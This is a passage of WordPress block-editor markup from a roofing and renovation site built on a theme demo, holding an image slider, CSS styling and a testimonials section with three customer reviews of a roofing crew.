{\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"f3bc0552-a5a5-4575-aa4d-c19791bc625e\"} -->\n<style type=\"text/css\"> .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4ef232e7-4452-4f40-9949-fe0d82ccff32\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-4ef232e7-4452-4f40-9949-fe0d82ccff32 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7fb2dcec-224f-4765-8762-daef2cd5aa1c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7fb2dcec-224f-4765-8762-daef2cd5aa1c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. \",\"name\":\"RIck \\u0026amp; Peggy \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..\",\"name\":\"Mike\",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"be53c5bc\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-be53c5bc\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-be53c5bc\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. </div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">RIck &amp; Peggy </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">Mike</span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4c086610-bd57-4da0-863d-9e60a966c85a\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-4c086610-bd57-4da0-863d-9e60a966c85a background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"6b0e2ffd-e3fd-4707-bd8d-df424a1d4029\"} -->\n<style type=\"text/css\"> .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: 